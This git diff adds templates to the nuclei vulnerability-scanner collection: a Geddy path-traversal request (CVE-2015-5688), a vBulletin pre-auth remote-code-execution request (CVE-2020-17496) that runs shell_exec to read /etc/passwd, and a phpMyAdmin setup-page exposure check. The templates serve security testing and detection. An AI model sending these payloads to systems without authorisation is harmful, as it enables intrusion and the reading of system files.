diff --git a/README.md b/README.md index f35e301e7c..b98fc89840 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 12 | default-logins | 10 | +| workflows | 21 | miscellaneous | 13 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 597 files**. +**61 directories, 600 files**. diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml new file mode 100644 index 0000000000..0835a41425 --- /dev/null +++ b/cves/2015/CVE-2015-5688.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-5688 + +info: + name: Geddy before v13.0.8 LFI + author: pikpikcu + severity: high + issues: https://github.com/geddy/geddy/issues/697 + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688 + tags: cve,cve2015,geddy,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index cc906fc2b6..dd2b8b5604 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -20,4 +20,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml new file mode 100644 index 0000000000..e5eab40390 --- /dev/null +++ b/cves/2020/CVE-2020-17496.yaml @@ -0,0 +1,25 @@ +id: CVE-2020-17496 +info: + name: vBulletin Pre-Auth RCE + author: pussycat0x + severity: critical + reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed + tags: cve,cve2020,vbulletin,rce + +requests: + - raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Content-Type: application/x-www-form-urlencoded + + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/miscellaneous/phpmyadmin-setup.yaml b/miscellaneous/phpmyadmin-setup.yaml new file mode 100644 index 0000000000..68d64e30f0 --- /dev/null +++ b/miscellaneous/phpmyadmin-setup.yaml @@ -0,0 +1,29 @@ +id: phpmyadmin-setup + +info: + name: Publicly Accessible Phpmyadmin Setup + author: sheikhrishad + severity: medium + + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/_phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + + matchers-condition: and + matchers: + - type: word + words: + - "You want to configure phpMyAdmin using web interface" + + - type: status + status: + - 200 \ No newline at end of file